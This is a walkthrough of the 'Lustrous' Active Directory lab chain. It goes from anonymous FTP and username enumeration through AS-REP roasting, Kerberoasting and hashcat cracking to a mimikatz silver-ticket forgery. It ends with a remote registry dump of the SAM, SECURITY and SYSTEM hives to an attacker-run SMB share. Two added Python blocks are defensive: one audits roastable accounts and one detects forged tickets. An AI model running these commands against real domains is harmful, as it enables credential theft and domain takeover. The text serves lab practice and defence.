Vulnlab - Lustrous (Chain) - Medium
Warning
I did this chain in two sittings, so the IPs changed partway through the walkthrough. To be clear:
- 10.10.202.181 = 10.10.220.69 = lusdc.lustrous.vl
- 10.10.202.182 = 10.10.220.70 = lusms.lustrous.vl
LusDC.lustrous.vl
Initial Access
Let's begin, as always, with an nmap scan to see which ports and services we can reach:
exegol-chains /workspace $ nmap -sV -sC -p- -A --max-retries 1 -n 10.10.202.181 -T4
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_12-26-21 11:50AM <DIR> transfer
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=LusDC.lustrous.vl
| Subject Alternative Name: DNS:LusDC.lustrous.vl
| Not valid before: 2021-12-26T09:46:02
|_Not valid after: 2022-12-26T00:00:00
|_http-title: Not Found
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-02-13T12:10:34+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=LusDC.lustrous.vl
| Not valid before: 2025-02-12T12:05:06
|_Not valid after: 2025-08-14T12:05:06
| rdp-ntlm-info:
| Target_Name: LUSTROUS
| NetBIOS_Domain_Name: LUSTROUS
| NetBIOS_Computer_Name: LUSDC
| DNS_Domain_Name: lustrous.vl
| DNS_Computer_Name: LusDC.lustrous.vl
| DNS_Tree_Name: lustrous.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-02-13T12:09:54+00:00
9389/tcp open mc-nmf .NET Message Framing
49668/tcp open msrpc Microsoft Windows RPC
58639/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (85%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Nmap arguments
- -sV : retrieves the version of each service
- -sC : runs the default nmap scripts
- -p- : scans all 65535 ports
- -A : enables OS and version detection (aggressive scan)
- --max-retries 1 : limits nmap to a single retry per port
- -n : skips name resolution
Nmap shows an FTP service, and anonymous authentication appears to be allowed. Once connected, we can see a few potential usernames:
exegol-chains /workspace $ ftp anonymous@10.10.202.181
Connected to 10.10.202.181.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50101|)
125 Data connection already open; Transfer starting.
12-26-21 11:50AM <DIR> transfer
226 Transfer complete.
ftp> cd transfer
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50102|)
125 Data connection already open; Transfer starting.
12-26-21 11:51AM <DIR> ben.cox
12-26-21 11:49AM <DIR> rachel.parker
12-26-21 11:49AM <DIR> tony.ward
12-26-21 11:50AM <DIR> wayne.taylor
226 Transfer complete.
There's nothing interesting here other than the fact that we have 4 potential users. With Kerbrute, we can confirm that these users exist in the domain:
exegol-chains /workspace $ kerbrute userenum --domain lustrous.vl --dc 10.10.202.181 users
Version: dev (n/a) - 02/13/25 - Ronnie Flathers @ropnop
2025/02/13 14:10:23 > Using KDC(s):
2025/02/13 14:10:23 > 10.10.202.181:88
2025/02/13 14:10:23 > [+] VALID USERNAME: tony.ward@lustrous.vl
2025/02/13 14:10:23 > [+] VALID USERNAME: wayne.taylor@lustrous.vl
2025/02/13 14:10:23 > [+] VALID USERNAME: rachel.parker@lustrous.vl
2025/02/13 14:10:23 > [+] VALID USERNAME: ben.cox@lustrous.vl
2025/02/13 14:10:23 > Done! Tested 4 usernames (4 valid) in 0.073 seconds
Since we have 4 users, we can check whether Kerberos pre-authentication is required for them; if it is not, we can request a TGT (an AS-REP) for the user without knowing the password:
exegol-chains /workspace $ GetNPUsers.py lustrous.vl/ -usersfile users -dc-ip 10.10.202.181
Impacket v0.13.0.dev0+20241210.172718.365fccfc - Copyright Fortra, LLC and its affiliated companies
$krb5asrep$23$ben.cox@LUSTROUS.VL:cbc83562991fc156bbd901e305a31d88$e0ee0b079806d1a9a7cf9d997bc9c307aa6001da1ee3724278442e368df4a1f9bbbead6616ab27e34<REDACTED>
[-] User rachel.parker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User tony.ward doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wayne.taylor doesn't have UF_DONT_REQUIRE_PREAUTH set
The encrypted part of the AS-REP is derived from the user's password hash, so we can try hashcat to recover the plain-text password:
exegol-chains /workspace $ hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 1 sec
$krb5asrep$23$ben.cox@LUSTROUS.VL:cbc83562991fc156bbd901e305a31d88$e0ee0b079806d1a9a7cf9d997bc9c307aa6001da1ee3724278442e368df4a1f9bbbeaw<REDACTED>:<REDACTED>
Now, we can use NetExec to check that this credential is valid (users is a text file containing the 4 usernames):
exegol-chains /workspace $ nxc smb 10.10.202.181 -u 'users' -p '<REDACTED>'
SMB 10.10.202.181 445 LUSDC [*] Windows Server 2022 Build 20348 x64 (name:LUSDC) (domain:lustrous.vl) (signing:True) (SMBv1:False)
SMB 10.10.202.181 445 LUSDC [+] lustrous.vl\ben.cox:<REDACTED>
Lateral Movement
With access to the domain, we can now retrieve all domain users and add them to our user wordlist. To do that I use NetExec and a bit of awk:
exegol-chains /workspace $ nxc smb 10.10.202.181 -u 'users' -p '<REDACTED>' --users | awk {'print $5'}
[*]
[+]
-Username-
Administrator
Guest
krbtgt
Deborah.Harris
Duncan.Spencer
Brenda.Andrews
Rachel.Parker
Wayne.Taylor
Hugh.Wilkinson
Tracy.Roberts
Bradley.Hancock
Tony.Ward
Joanna.Hall
Marian.Elliott
Ben.Cox
Joanna.Harvey
Jeremy.Clark
Allan.Parker
Mitchell.Fuller
Colin.Dodd
Liam.Atkinson
Michelle.John
Iain.Evans
Donna.Collins
Cameron.Walsh
svc_web
svc_db
[*]
With a valid list of users, I tried Kerberoasting to see whether any of them are service accounts with an SPN; for that we can use GetUserSPNs.py:
exegol-chains /workspace $ GetUserSPNs.py -usersfile "users" -dc-host "10.10.202.181" "lustrous.vl"/ben.cox:<REDACTED>
Impacket v0.13.0.dev0+20241210.172718.365fccfc - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[-] Principal: Administrator - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Guest - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$18$krbtgt$LUSTROUS.VL$*krbtgt*$26509dc78563694e2daf82dd$
[-] Principal: Deborah.Harris - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Duncan.Spencer - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Brenda.Andrews - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Rachel.Parker - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Wayne.Taylor - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Hugh.Wilkinson - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Tracy.Roberts - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Bradley.Hancock - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Tony.Ward - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Joanna.Hall - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Marian.Elliott - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Ben.Cox - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Joanna.Harvey - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Jeremy.Clark - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Allan.Parker - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Mitchell.Fuller - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Colin.Dodd - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Liam.Atkinson - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Michelle.John - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Iain.Evans - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Donna.Collins - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Cameron.Walsh - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$23$*svc_web$LUSTROUS.VL$svc_web*$56cbf754a5730eb363576b389c527c7f$fa4864c90891f15aca3f48476939c0f38b74e3eb373da2bf55a47fcdacffa6a2c43afadbca4fac1d7333929a1fd47f4a252c7f2eea43ff0e646a1346e218498816b28cac<REDACTED>
$krb5tgs$23$*svc_db$LUSTROUS.VL$svc_db*$e877e2675c661f9d7b86992db97de8eb$782ef773f8070acf9f008007b21c1897da93949d741026f9785136635cae9e7c38b168369b081a0f6845587d118f911a110d43f6a38cf58078fd640d5f1647d88449164b<REDACTED>
Let's use hashcat again to recover the plain-text password:
exegol-chains /workspace $ hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
$krb5tgs$23$*svc_web$LUSTROUS.VL$svc_web*$56cbf754a5730eb363576b389c527c7f$fa4864c90891f15aca3f48476939c0f38b74e3eb373da2bf55a47fcdacffa6a2c43afadbca4fac1d7333929a1fd47f4a252c7f2eea43ff0e646a1346e218498816b28cacw<REDACTED>:<REDACTED>
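The two roasting steps above (AS-REP roasting of ben.cox, Kerberoasting of svc_web and svc_db) both come down to account settings a defender can audit: pre-authentication disabled, and user accounts that carry an SPN and still accept RC4. The following added example (not from the original write-up) audits a constructed set of directory records for those conditions and parses hash lines in the format GetNPUsers.py and GetUserSPNs.py print, so it also explains why the krbtgt line above is etype 18 while the service accounts got etype 23. The records, SPNs and shortened hash values are assumptions made up for the example.

```python
import re

# userAccountControl and msDS-SupportedEncryptionTypes bit values
# (standard Active Directory constants).
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_SERVER_TRUST_ACCOUNT = 0x2000
UF_DONT_REQUIRE_PREAUTH = 0x400000
KERB_ENCTYPE_RC4_HMAC_MD5 = 0x4

# hashcat modes for the roasting hash formats seen in this chain.
HASHCAT_MODES = {("asrep", 23): 18200, ("tgs", 23): 13100,
                 ("tgs", 17): 19600, ("tgs", 18): 19700}

# Constructed directory records modelled on the accounts in this chain.
# The SPNs and encryption-type values are made up for the example.
SAMPLE_USERS = [
    {"sAMAccountName": "ben.cox", "userAccountControl": 0x400200,
     "servicePrincipalName": [], "msDS-SupportedEncryptionTypes": None},
    {"sAMAccountName": "rachel.parker", "userAccountControl": 0x200,
     "servicePrincipalName": [], "msDS-SupportedEncryptionTypes": None},
    {"sAMAccountName": "svc_web", "userAccountControl": 0x10200,
     "servicePrincipalName": ["http/lusdc.lustrous.vl"],
     "msDS-SupportedEncryptionTypes": None},
    {"sAMAccountName": "svc_db", "userAccountControl": 0x10200,
     "servicePrincipalName": ["db/lusdc.lustrous.vl"],
     "msDS-SupportedEncryptionTypes": 0x18},
    {"sAMAccountName": "LUSDC$", "userAccountControl": 0x82000,
     "servicePrincipalName": ["HOST/lusdc.lustrous.vl"],
     "msDS-SupportedEncryptionTypes": 0x1C},
]

# Shortened sample hash lines in the format GetNPUsers.py / GetUserSPNs.py print
# (prefixes as in the output above, encrypted parts truncated and made up).
SAMPLE_HASHES = [
    "$krb5asrep$23$ben.cox@LUSTROUS.VL:cbc83562991fc156bbd901e305a31d88$e0ee0b07",
    "$krb5tgs$18$krbtgt$LUSTROUS.VL$*krbtgt*$26509dc78563694e2daf82dd$00112233",
    "$krb5tgs$23$*svc_web$LUSTROUS.VL$svc_web*$56cbf754a5730eb363576b389c527c7f$fa4864c9",
]


def audit_accounts(users):
    """Return (account, finding) pairs for roasting-prone accounts."""
    findings = []
    for u in users:
        name, uac = u["sAMAccountName"], u["userAccountControl"]
        if uac & UF_DONT_REQUIRE_PREAUTH:
            findings.append((name, "AS-REP roastable: Kerberos pre-authentication not required"))
        is_computer = bool(uac & (UF_WORKSTATION_TRUST_ACCOUNT | UF_SERVER_TRUST_ACCOUNT))
        if u["servicePrincipalName"] and not is_computer and name.lower() != "krbtgt":
            etypes = u["msDS-SupportedEncryptionTypes"]
            # Assumption: an unset attribute is treated as RC4-capable, which is the
            # historical default and matches svc_web/svc_db in this chain (etype 23).
            rc4 = etypes is None or bool(etypes & KERB_ENCTYPE_RC4_HMAC_MD5)
            findings.append((name, "Kerberoastable user account with SPN, "
                             + ("RC4 service tickets allowed" if rc4 else "AES only")))
    return findings


def classify_roast_hash(line):
    """Parse a $krb5asrep$/$krb5tgs$ line into kind, etype, account and hashcat mode."""
    m = re.match(r"^\$krb5(asrep|tgs)\$(\d+)\$(.*)$", line.strip())
    if not m:
        return None
    kind, etype, rest = m.group(1), int(m.group(2)), m.group(3)
    if kind == "asrep":
        account = rest.split(":", 1)[0]          # user@REALM
    else:
        # RC4 lines start with "*user$REALM$spn*$", AES lines with "user$REALM$*spn*$".
        account = rest.lstrip("*").split("$", 1)[0]
    return {"kind": kind, "etype": etype, "account": account,
            "hashcat_mode": HASHCAT_MODES.get((kind, etype))}


if __name__ == "__main__":
    for account, finding in audit_accounts(SAMPLE_USERS):
        print(f"[!] {account}: {finding}")
    for line in SAMPLE_HASHES:
        print(classify_roast_hash(line))
```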
Privilege Escalation
Now it’s the moment when I have to explain few things, because what I had to do was not a clear path for me.
So, we have the plain text password of the service account svc_web
and during our enumeration of the DC, we found that there is a http service running.
If we curl the service, we can see through the header www-authenticate
Kerberos is used :
exegol-chains /workspace $ curl -I https://lusdc.lustrous.vl -k
HTTP/2 401
cache-control: private
content-length: 1293
content-type: text/html
server: Microsoft-IIS/10.0
x-aspnet-version: 4.0.30319
www-authenticate: Negotiate // Here it means Kerberos is used
x-powered-by: ASP.NET
Kerberos is used to authenticate clients to the web server. Let's authenticate as the user ben.cox to see what we can find on this web application:
This web app seems to be a notes application, where the user has a note about his password (a nice way to not forget his password I guess 🤨).
Since authentication is done through Kerberos, the page shows the notes of whichever user we authenticate as.
Remember that we hold the plain-text password of the service account that (I assume) runs this app. That means we can perform a silver ticket attack!
How is this possible? One of the last steps of Kerberos authentication is the TGS exchange, which produces the service ticket presented to the requested service; that ticket is encrypted with the key of the service account. The service decrypts it with its own key and trusts its content, without the KDC being involved in issuing it.
If we hold the service account's hash, we can forge our own ticket, put what we want in it (within the constraints of the ticket format) and encrypt it with that hash. So what prevents us from putting any user in it, for example Administrator? Nothing.
First, let's compute the NT hash of the service account's password with pypykatz:
exegol-chains /workspace $ pypykatz crypto nt iy<REDACTED>
e67af8b3<REDACTED>
With this hash we can now forge our ticket. To do that I connected via RDP to the LusMS machine and used mimikatz:
PS C:\users\public> .\mimikatz.exe "kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /target:lusdc.lustrous.vl /service:http /rc4:e67a<REDACTED> /user:Administrator /id:500 /ptt" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /target:lusdc.lustrous.vl /service:http /rc4:e67af8b3d78<REDACTED> /user:Administrator /id:500 /ptt
User : Administrator
Domain : lustrous.vl (LUSTROUS)
SID : S-1-5-21-2355092754-1584501958-1513963426
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: e67af8b3d78df<REDACTED> - rc4_hmac_nt
Service : http
Target : lusdc.lustrous.vl
Lifetime : 2/13/2025 8:35:39 PM ; 2/11/2035 8:35:39 PM ; 2/11/2035 8:35:39 PM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ lustrous.vl' successfully submitted for current session
mimikatz(commandline) # exit
Bye!
Mimikatz arguments
- kerberos::golden : the module used to perform Diamond/Silver/Golden ticket attacks
- /sid : the domain SID
- /domain : the FQDN of the domain
- /target : the host of the targeted service (here the DC itself)
- /service : the service class we want in our ticket
- /rc4 : the NT hash of the service account
- /user : the user we want to impersonate in our ticket
- /id : the RID of that user
- /ptt : injects the ticket into the current session (pass-the-ticket)
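A ticket forged this way is never requested from the KDC, so the DC logs no 4769 (service ticket request) for it, while the web host still records a Kerberos network logon (4624) for whatever user name was written into the ticket. The following added example (not from the original write-up) correlates constructed DC and web-host Security events to surface such logons; the event fields, timestamps and the 10-minute lookback window are assumptions.

```python
from datetime import datetime, timedelta

# Constructed Security events (not real logs from the lab). The DC records a
# TGS request (4769) for ben.cox against the HTTP service account; the web host
# then records ben.cox's Kerberos network logon (4624). The Administrator logon
# has no 4769 behind it, which is what a forged service ticket looks like.
DC_EVENTS = [
    {"EventID": 4768, "Time": "2025-02-13T20:29:58", "TargetUserName": "ben.cox",
     "ServiceName": "krbtgt", "IpAddress": "10.10.202.182"},
    {"EventID": 4769, "Time": "2025-02-13T20:30:01", "TargetUserName": "ben.cox@LUSTROUS.VL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "IpAddress": "10.10.202.182"},
]
HOST_EVENTS = [
    {"EventID": 4624, "Time": "2025-02-13T20:30:03", "TargetUserName": "ben.cox",
     "LogonType": 3, "AuthenticationPackageName": "Kerberos", "IpAddress": "10.10.202.182"},
    {"EventID": 4624, "Time": "2025-02-13T20:35:41", "TargetUserName": "Administrator",
     "LogonType": 3, "AuthenticationPackageName": "Kerberos", "IpAddress": "10.10.202.182"},
    # Service logon of the app pool account: not a Kerberos network logon, ignored.
    {"EventID": 4624, "Time": "2025-02-13T20:36:10", "TargetUserName": "svc_web",
     "LogonType": 5, "AuthenticationPackageName": "Negotiate", "IpAddress": "-"},
]


def _ts(value):
    return datetime.fromisoformat(value)


def _user(name):
    """Normalise 'ben.cox@LUSTROUS.VL', 'LUSTROUS\\ben.cox' or 'Ben.Cox' to 'ben.cox'."""
    return name.split("@", 1)[0].split("\\")[-1].lower()


def find_unissued_kerberos_logons(dc_events, host_events, service_account,
                                  window=timedelta(minutes=10)):
    """Kerberos network logons on the host with no TGS issued by the DC beforehand."""
    # Index the DC's service-ticket issuances for the account that runs the service.
    tgs_by_user = {}
    for e in dc_events:
        if e["EventID"] == 4769 and _user(e["ServiceName"]) == service_account.lower():
            tgs_by_user.setdefault(_user(e["TargetUserName"]), []).append(_ts(e["Time"]))
    suspicious = []
    for e in host_events:
        if (e["EventID"] != 4624 or e["LogonType"] != 3
                or e["AuthenticationPackageName"] != "Kerberos"):
            continue
        logon_time = _ts(e["Time"])
        user = _user(e["TargetUserName"])
        issued = any(logon_time - window <= t <= logon_time for t in tgs_by_user.get(user, []))
        if not issued:
            suspicious.append({"user": user, "time": e["Time"], "source": e["IpAddress"]})
    return suspicious


if __name__ == "__main__":
    for hit in find_unissued_kerberos_logons(DC_EVENTS, HOST_EVENTS, "svc_web"):
        print(f"[!] Kerberos logon without TGS issuance: {hit}")
```

A real deployment needs both logs on a common clock and should also check that the service account's key is not RC4-only, since that is what made the forged ticket above cheap to build.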
Perfect, we have a Kerberos ticket as Administrator@lustrous.vl for the HTTP service, so we can authenticate to the web application using Invoke-WebRequest:
PS C:\users\public> Invoke-WebRequest -Uri http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Notes - SNotes</title>
<link href="/Content/css?v=-ajo3J6QtgGZONnv3AZei244jm7A7pCtHShB7DstoFM1" rel="stylesheet"/>
<script src="/bundles/modernizr?v=inCVuEFe6J4Q07A0AcRsbJic_UE5MwpRMNGcOtk94TE1"></script>
<script src="/bundles/jquery?v=8Oos0avDZyPg-cbyVzvkIfERIE1DGSe3sRQdCSYrgEQ1"></script>
<script src="/bundles/bootstrap?v=M4Nk6kIOwMFflsEKET0iPL9i5YBqbzMzvUOrd8gyCnw1"></script>
</head>
<body>
<div class="navbar navbar-inverse navbar-fixed-top">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="/">Secure Notes</a>
</div>
<div class="navbar-collapse collapse">
<ul class="nav navbar-nav">
<li><a href="/Internal">Notes</a></li>
</ul>
</div>
</div>
</div>
<div class="container body-content">
<h2>Notes</h2>
<p>Welcome, LUSTROUS\Administrator!</p>
<div class="table">
<table class="table table-bordered table-hover">
<thead>
<th>
id
</th>
<th>
Name
</th>
<th>
note
</th>
<th>
author
</th>
<th>
actions
</th>
</thead>
<tbody>
<tr>
<td>
1
</td>
<td>
Note
</td>
<td>
Guess we better don't use the administrator account for this..
</td>
<td>
lustrous_administrator
</td>
<td>
<a class="btn btn-danger" href="/Internal/DeleteNote/1">Delete</a>
</td>
</tr>
</tbody>
</table>
<input type="button" value="New Note" onclick="window.location.href='/Internal/CreateNote'" />
</div>
<hr />
<footer>
<p>&copy; 2025 - SNotes</p>
</footer>
</div>
</body>
</html>
Unfortunately, the administrator doesn't have a reminder about his password.
After some enumeration of the other users, I found an interesting one: tony.ward. He is a member of Backup Admins, and that group is a member of Backup Operators:
Let's repeat the previous steps with mimikatz, this time for the user tony.ward:
PS C:\users\public> .\mimikatz.exe "kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /target:lusdc.lustrous.vl /service:http /rc4:e67af8b3<REDACTED> /user:tony.ward /id:1114 /ptt" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /target:lusdc.lustrous.vl /service:http /rc4:e67af8b3d<REDACTED> /user:tony.ward /id:1114 /ptt
User : tony.ward
Domain : lustrous.vl (LUSTROUS)
SID : S-1-5-21-2355092754-1584501958-1513963426
User Id : 1114
Groups Id : *513 512 520 518 519
ServiceKey: e67af8b3d78df5<REDACTED> - rc4_hmac_nt
Service : http
Target : lusdc.lustrous.vl
Lifetime : 2/13/2025 8:43:49 PM ; 2/11/2035 8:43:49 PM ; 2/11/2035 8:43:49 PM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'tony.ward @ lustrous.vl' successfully submitted for current session
mimikatz(commandline) # exit
Bye!
If we use Invoke-WebRequest again, we see the plain-text password of our user:
PS C:\users\public> Invoke-WebRequest -Uri http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Notes - SNotes</title>
<link href="/Content/css?v=-ajo3J6QtgGZONnv3AZei244jm7A7pCtHShB7DstoFM1" rel="stylesheet"/>
<script src="/bundles/modernizr?v=inCVuEFe6J4Q07A0AcRsbJic_UE5MwpRMNGcOtk94TE1"></script>
<script src="/bundles/jquery?v=8Oos0avDZyPg-cbyVzvkIfERIE1DGSe3sRQdCSYrgEQ1"></script>
<script src="/bundles/bootstrap?v=M4Nk6kIOwMFflsEKET0iPL9i5YBqbzMzvUOrd8gyCnw1"></script>
</head>
<body>
<div class="navbar navbar-inverse navbar-fixed-top">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="/">Secure Notes</a>
</div>
<div class="navbar-collapse collapse">
<ul class="nav navbar-nav">
<li><a href="/Internal">Notes</a></li>
</ul>
</div>
</div>
</div>
<div class="container body-content">
<h2>Notes</h2>
<p>Welcome, LUSTROUS\Tony.Ward!</p>
<div class="table">
<table class="table table-bordered table-hover">
<thead>
<th>
id
</th>
<th>
Name
</th>
<th>
note
</th>
<th>
author
</th>
<th>
actions
</th>
</thead>
<tbody>
<tr>
<td>
4
</td>
<td>
Password Reminder
</td>
<td>
U_cP<REDACTED>
</td>
<td>
lustrous_tony.ward
</td>
<td>
<a class="btn btn-danger" href="/Internal/DeleteNote/4">Delete</a>
</td>
</tr>
<tr>
<td>
5
</td>
<td>
Task
</td>
<td>
Create Domain Backups
</td>
<td>
lustrous_tony.ward
</td>
<td>
<a class="btn btn-danger" href="/Internal/DeleteNote/5">Delete</a>
</td>
</tr>
</tbody>
</table>
<input type="button" value="New Note" onclick="window.location.href='/Internal/CreateNote'" />
</div>
<hr />
<footer>
<p>&copy; 2025 - SNotes</p>
</footer>
</div>
</body>
</html>
I was not able to connect through RDP or any other remote shell with this user, so I decided to use reg.py from Impacket to dump the SAM remotely, which his Backup Operators membership allows.
First, we need to start an SMB server to receive the saved hives:
exegol-chains /workspace $ smbserver.py -smb2support EXEGOL .
Impacket v0.13.0.dev0+20241210.172718.365fccfc - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Then, we can use reg.py to save the SAM, SECURITY and SYSTEM hives to our share:
exegol-chains x64 $ reg.py "lustrous.vl"/"tony.ward":"U_cPV<REDACTED>"@"10.10.220.69" save -keyName 'HKLM\SAM' -o '\\10.8.2.242\EXEGOL'
Impacket v0.13.0.dev0+20241210.172718.365fccfc - Copyright Fortra, LLC and its affiliated companies
[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SAM to \\10.8.2.242\EXEGOL\SAM.save
exegol-chains x64 $ reg.py "lustrous.vl"/"tony.ward":"U_cPV<REDACTED>"@"10.10.220.69" save -keyName 'HKLM\SECURITY' -o '\\10.8.2.242\EXEGOL'
Impacket v0.13.0.dev0+20241210.172718.365fccfc - Copyright Fortra, LLC and its affiliated companies
[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SECURITY to \\10.8.2.242\EXEGOL\SECURITY.save
exegol-chains x64 $ reg.py "lustrous.vl"/"tony.ward":"U_cPV<REDACTED>"@"10.10.220.69" save -keyName 'HKLM\SYSTEM' -o '\\10.8.2.242\EXEGOL'
Impacket v0.13.0.dev0+20241210.172718.365fccfc - Copyright Fortra, LLC and its affiliated companies
[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SYSTEM to \\10.8.2.242\EXEGOL\SYSTEM.save
To extract the hashes, we can use the well-known secretsdump.py, again from Impacket:
exegol-chains sam $ secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL
